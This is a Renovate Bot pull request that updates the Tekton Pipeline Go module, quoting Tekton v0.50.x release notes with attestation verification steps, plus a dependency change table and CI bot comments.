REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.2@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Fixes
  • 🐛 [release-v0.50.x] Regression: fix results with out of order tasks (#​7173)

Fix regression where a different order of task definition may cause result resolution to break

  • 🐛 [release-v0.50.x] Validate beta features for inline pipelines and tasks (#​7080)

Bug fix: validate beta features in inline tasks/pipelines in the same way as referenced tasks/pipelines

  • 🐛 [release-v0.50.x] Fix release pipeline (publish-to-bucket) (#​7045)

Fixed the release pipeline invalid spec.

Misc
  • 🔨 Increase the publish timeout (#​7215)
Docs
  • 📖 [release-v0.50.x] docs: Update references to examples from v1beta1 to v1 (#​7202)

Thanks

Thanks to these contributors who contributed to v0.50.2!

Extra shout-out for awesome release notes:

v0.50.1: Tekton Pipeline release v0.50.1 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.1
-Examples @​ v0.50.1

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.1/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a1b02a57c8f75368d54f3f986188b3692201557a51808b4bc4e8acc1fcb835e38

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a1b02a57c8f75368d54f3f986188b3692201557a51808b4bc4e8acc1fcb835e38
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.1/release.yaml
REKOR_UUID=24296fb24b8ad77a1b02a57c8f75368d54f3f986188b3692201557a51808b4bc4e8acc1fcb835e38

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.1@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

Fixes
  • 🐛 [release-v0.50.x] Make sure we use the correct namespace for remote Pipeline validation (#​7023)

Fix validation errors when using the cluster resolver

  • 🐛 [release-v0.50.x] Fix Taskrun Failure for Preempted Pod of Taskrun (#​7009)

This fixes the Taskrun failure for a Preempted Pod of a Taskrun which uses a PVC.

Misc
Docs

Thanks

Thanks to these contributors who contributed to v0.50.1!

Extra shout-out for awesome release notes:

v0.50.0: Tekton Pipeline release v0.50.0 "Russian Blue Daneel Olivaw"

Compare Source

🎉 v1beta1 deprecation (1 year support still) 🎉

-Docs @​ v0.50.0
-Examples @​ v0.50.0

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.0/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a1665fb7556e457413b181806c513eeea26f12c0bd118bcf14912ee6bbee395d9

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a1665fb7556e457413b181806c513eeea26f12c0bd118bcf14912ee6bbee395d9
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.0/release.yaml
REKOR_UUID=24296fb24b8ad77a1665fb7556e457413b181806c513eeea26f12c0bd118bcf14912ee6bbee395d9

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.0@sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

  • ✨ Update Stability Level for CSI and Projected Volume Workspaces (#​6954)

csi and projected volume workspaces are stable.

  • ✨ [TEP-0029] Isolated steps and sidecar workspaces to beta (#​6922)

The "isolated workspaces" feature allows users to share a workspace with dedicated steps and sidecars, instead of the whole TaskRun. The feature has been promoted to "beta".

  • ✨ [TEP-0135] Revert PVC creation (#​6893)

TEP-0135: Revert the owner of PVCs created by the pipelinerun VolumeClaimTemplate back to the pipelinerun. The PVCs bound to the pipelinerun now remain in the Bound state when the pipelinerun is completed but not deleted.

  • ✨ [TEP-0137] Add events config map (#​6883)

action required: The default-cloud-events-sink setting in the config-defaults config map is deprecated. The CloudEvents sink shall be configured now through the sink settings in the new config-events config map.

  • ✨ TEP-0135: Introduce coschedule feature flags (#​6790)

tep-0135: introduce coschedule feature flag

  • ✨ Add support for consuming whole array results in matrix (#​6603)

TEP-0090: Pipeline Tasks may now reference whole array results in a Matrix. See https://github.com/tektoncd/pipeline/blob/09d422cff057f67170b4c2f76097ac6ffded33ef/docs/matrix.md?specifying-results-in-a-matrix#specifying-results-in-a-matrix docs for more information.

  • ✨ [TEP-0135] Purge finalizer and delete PVC (#​6940)
  • ✨ [TEP-0135] coschedule isolate pipelinerun (#​6929)
  • ✨ TEP-0135: implement per-pipelinerun coscheduling (#​6819)
  • ✨ Change ordering of ResolveResultRefs/ApplyTaskResults (#​6792)
Fixes
  • 🐛 Add validation for feature-flags configmap to webhook (#​6935)

Added validation for feature-flags configmap

  • 🐛 Fix units for metric taskrun_pod_latency (#​6891)

Bug fix: taskruns_pod_latency metric renamed to taskruns_pod_latency_milliseconds and units corrected

  • 🐛 Perform webhook validation for remote pipelines (#​6887)

bug fix: Remote Pipelines do not support propagated parameters and workspaces

  • 🐛 Fix PipelineRun reconciler panic for computed timeouts (#​6886)

bug fix: Avoid controller panics for computed timeouts

  • 🐛 Fail PipelineRun when it can't create Runs (#​6866)

bug fix: PipelineRun marked as failed when it cannot create TaskRuns or CustomRuns for a non-retryable reason

  • 🐛 Use the same validation for all taskrefs (#​6854)

bug fix: Disallow taskref.name with taskref.resolver in pipeline tasks

  • 🐛 merge podTemplates instead of overriding (#​6850)

Merge podTemplate specified in pipelineRun.spec.taskRunSpecs[].podTemplate along with pipelineRun.spec.podTemplate instead of only considering the one specified at the taskRunSpecs.

  • 🐛 Fix workingdirinit step for Windows tasks (#​6820)

Fixed an issue where Windows tasks would fail if one or more steps were configured with a custom working directory.

  • 🐛 Fail upgrade tests when test script fails (#​6871)
  • 🐛 Restore Upgrade Test Scenario2 by creating simple Task and Pipeline resources (#​6855)
  • 🐛 Fix release pipeline (#​6849)
  • 🐛 Fix flake of TestPipelineTaskTimeout (#​6955)
  • 🐛 Fix flaky Affinity Assistant test (#​6925)

Misc
  • 🔨 Move feature flags testing functions into testing package (#​6933)

Some exported functions moved from pkg/apis/config to pkg/apis/config/testing

  • 🔨 cleaning up config-artifact-* (#​6902)

config-artifact-pvc and config-artifact-bucket are deleted as resources from the tekton-pipelines-controller role.
CONFIG_ARTIFACT_PVC_NAME and CONFIG_ARTIFACT_BUCKET_NAME are deleted from the tekton-pipelines-controller deployment.

  • 🔨 Bump knative/pkg to 1.10 (#​6907)

knative/pkg is updated to v1.10

  • 🔨 [TEP-0137] Rename customrun package (#​6884)

The CustomRun events controller has been moved to the pkg/reconciler/notifications package.

  • 🔨 Replace redundant function CheckAlphaOrBetaFields (#​6934)
  • 🔨 Delete .ko.yaml (#​6931)
  • 🔨 Fix typo in AffinityAssistantBehavior (#​6930)
  • 🔨 Deduplicate examples tests between v1 and v1beta1 (#​6908)
  • 🔨 Reduce spam in integration test logs (#​6873)
  • 🔨 Remove yaml tests (#​6872)
  • 🔨 Add Testing: Failed Matrix PipelineRun for Out Of Bounds Array Indexing Results (#​6852)
  • 🔨 Refactor failure logic in pipelinerun resolution (#​6801)
  • 🔨 Bump k8s.io/api from 0.26.6 to 0.26.7 in /test/custom-task-ctrls/wait-task-beta (#​6951)
  • 🔨 Fix logger Fatalf message (#​6946)
  • 🔨 Do not require enable-api-fields=alpha for spire (#​6939)
  • 🔨 Bump github.com/sigstore/sigstore from 1.6.5 to 1.7.1 (#​6912)
  • 🔨 Bump github.com/spiffe/spire-api-sdk from 1.6.3 to 1.7.0 (#​6911)
  • 🔨 Bump github.com/opencontainers/image-spec from 1.1.0-rc3 to 1.1.0-rc4 (#​6910)
  • 🔨 Bump google.golang.org/grpc from 1.55.0 to 1.56.2 (#​6904)
  • 🔨 Ignore SA in assertion (#​6898)
  • 🔨 Add upgrade test against previous server version to prevent regressions (#​6896)
  • 🔨 Bump golang.org/x/sync from 0.2.0 to 0.3.0 (#​6880)
  • 🔨 Bump github.com/tektoncd/pipeline from 0.48.0 to 0.49.0 in /test/custom-task-ctrls/wait-task-beta (#​6853)
  • 🔨 Bump k8s.io/api from 0.26.5 to 0.26.6 in /test/custom-task-ctrls/wait-task-beta (#​6835)
  • 🔨 Bump k8s.io/client-go from 0.25.10 to 0.25.11 in /test/custom-task-ctrls/wait-task-beta (#​6834)
  • 🔨 Improve taskref_test coverage with more error test cases (#​6813)
  • 🔨 formatting error (#​6795)

Docs
  • 📖 [RFC] Increase support window for v1beta1 CRDs to 1 year (#​6923)

Support window for beta CRDs increased to 1 year

  • 📖 Mark v1beta1 apis as deprecated (#​6876)

action required: v1beta1 Task, TaskRun, Pipeline, and PipelineRun APIs are deprecated and will be removed. Please migrate to the v1 versions of these APIs following the migration guide at https://github.com/tektoncd/pipeline/blob/main/docs/migrating-v1beta1-to-v1.md.

  • 📖 Document that Workspaces can be unused (#​6917)
  • 📖 documenting the latest patch release - v0.44.4 (#​6895)
  • 📖 updating releases with 0.47.3 (#​6875)
  • 📖 Add set-security-context to feature flags docs (#​6865)
  • 📖 Add compatibility policy for ResolutionRequests (#​6864)
  • 📖 Update releases.md (#​6851)
  • 📖 Add instructions for picking commit in the release ([#​6735](https://redire

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR has been generated by Renovate Bot.

redhat-renovate-bot added the release-note-none label (Denotes a PR that doesn't merit a release note.) Feb 5, 2025
redhat-renovate-bot (Collaborator, Author) commented Feb 5, 2025

ℹ Artifact update notice

File name: modules/tests/go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 34 additional dependencies were updated

Details:

| Package | Change |
| --- | --- |
| k8s.io/api | v0.25.2 -> v0.27.1 |
| k8s.io/apimachinery | v0.25.2 -> v0.27.3 |
| knative.dev/pkg | v0.0.0-20221003153827-158538cc46ec -> v0.0.0-20230718152110-aef227e72ead |
| github.com/containerd/stargz-snapshotter/estargz | v0.11.0 -> v0.14.3 |
| github.com/docker/cli | v20.10.12+incompatible -> v24.0.0+incompatible |
| github.com/docker/docker-credential-helpers | v0.6.4 -> v0.7.0 |
| github.com/go-kit/log | v0.1.0 -> v0.2.0 |
| github.com/go-logfmt/logfmt | v0.5.0 -> v0.5.1 |
| github.com/go-logr/logr | v1.2.3 -> v1.2.4 |
| github.com/go-openapi/jsonpointer | v0.19.5 -> v0.19.6 |
| github.com/go-openapi/jsonreference | v0.19.6 -> v0.20.2 |
| github.com/go-openapi/swag | v0.21.1 -> v0.22.3 |
| github.com/google/gnostic | v0.5.7-v3refs -> v0.6.9 |
| github.com/google/go-containerregistry | v0.8.1-0.20220216220642-00c59d91847c -> v0.16.1 |
| github.com/hashicorp/golang-lru | v0.5.4 -> v1.0.2 |
| github.com/imdario/mergo | v0.3.12 -> v0.3.13 |
| github.com/klauspost/compress | v1.14.4 -> v1.16.5 |
| github.com/matttproud/golang_protobuf_extensions | v1.0.2-0.20181231171920-c182affec369 -> v1.0.4 |
| github.com/opencontainers/image-spec | v1.0.3-0.20220114050600-8b9d41f48198 -> v1.1.0-rc4 |
| github.com/prometheus/client_golang | v1.12.1 -> v1.14.0 |
| github.com/prometheus/client_model | v0.2.0 -> v0.3.0 |
| github.com/prometheus/common | v0.32.1 -> v0.37.0 |
| github.com/prometheus/procfs | v0.7.3 -> v0.8.0 |
| github.com/sirupsen/logrus | v1.8.1 -> v1.9.3 |
| github.com/vbatts/tar-split | v0.11.2 -> v0.11.3 |
| go.opencensus.io | v0.23.0 -> v0.24.0 |
| go.uber.org/atomic | v1.9.0 -> v1.10.0 |
| google.golang.org/api | v0.70.0 -> v0.138.0 |
| google.golang.org/genproto | v0.0.0-20230410155749-daa745c078e1 -> v0.0.0-20230803162519-f966b187b2e5 |
| k8s.io/apiextensions-apiserver | v0.24.4 -> v0.26.5 |
| k8s.io/klog/v2 | v2.70.2-0.20220707122935-0990e81f1a8f -> v2.100.1 |
| k8s.io/kube-openapi | v0.0.0-20220328201542-3ee0da9b0b42 -> v0.0.0-20230515203736-54b630e78af5 |
| k8s.io/utils | v0.0.0-20220728103510-ee6ede2d64ed -> v0.0.0-20230505201702-9f6742963106 |
| sigs.k8s.io/json | v0.0.0-20220713155537-f223a00ba0e2 -> v0.0.0-20221116044647-bc3834ca7abd |

kubevirt-bot added the dco-signoff: yes label (Indicates the PR's author has DCO signed all their commits.) and the size/XXL label Feb 5, 2025
openshift-ci bot requested review from 0xFelix and davidvossel February 5, 2025 10:28
openshift-ci bot commented Feb 5, 2025

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot
Once this PR has been reviewed and has the lgtm label, please assign ksimon1 for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

kubevirt-bot requested a review from ksimon1 February 5, 2025 10:29
kubevirt-bot (Contributor) commented:

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign ksimon1 for approval. For more information see the Kubernetes Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

redhat-renovate-bot force-pushed the renovate/release-v0.13-go-github.com-tektoncd-pipeline-vulnerability branch 3 times, most recently from 7f75599 to ee433c2, February 6, 2025 08:12
redhat-renovate-bot changed the title from "chore(deps): update module github.com/tektoncd/pipeline to v0.52.1 [security] (release-v0.13)" to "chore(deps): update module github.com/tektoncd/pipeline to v0.52.1 [security] (release-v0.13) - autoclosed" Feb 6, 2025
redhat-renovate-bot deleted the renovate/release-v0.13-go-github.com-tektoncd-pipeline-vulnerability branch February 6, 2025 10:03
redhat-renovate-bot changed the title from "chore(deps): update module github.com/tektoncd/pipeline to v0.52.1 [security] (release-v0.13) - autoclosed" back to "chore(deps): update module github.com/tektoncd/pipeline to v0.52.1 [security] (release-v0.13)" Feb 6, 2025
redhat-renovate-bot restored the renovate/release-v0.13-go-github.com-tektoncd-pipeline-vulnerability branch February 6, 2025 11:05
redhat-renovate-bot force-pushed the renovate/release-v0.13-go-github.com-tektoncd-pipeline-vulnerability branch from ee433c2 to 6a6cf64, February 6, 2025 15:10
openshift-ci bot commented Feb 6, 2025

@redhat-renovate-bot: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

| Test name | Commit | Details | Required | Rerun command |
| --- | --- | --- | --- | --- |
| ci/prow/e2e-tests-cluster-scope | 6a6cf64 | link | true | /test e2e-tests-cluster-scope |
| ci/prow/e2e-tests-namespace-scope | 6a6cf64 | link | true | /test e2e-tests-namespace-scope |

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.
